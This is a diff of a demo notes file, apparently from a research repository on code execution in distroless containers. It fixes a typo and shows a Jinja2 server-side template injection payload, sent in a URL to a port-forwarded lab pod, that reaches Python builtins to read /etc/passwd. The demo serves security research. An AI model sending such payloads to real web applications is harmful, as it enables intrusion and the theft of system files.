carlospolop/DistrolessRCE/DEMOS.md

 # Demo 1.5: Python SSTI
 kubectl port-forward dless-flask-ssti-pod 3002:1337

-## If no sh, and nor RCE but SSTI, this is still possible with raw python
+## If no sh, and not RCE but SSTI, this is still possible with raw python
 http://127.0.0.1:3002/?name={{(1).__class__.__base__.__subclasses__()[216]()._module.__builtins__["open"]("/etc/passwd").read()}}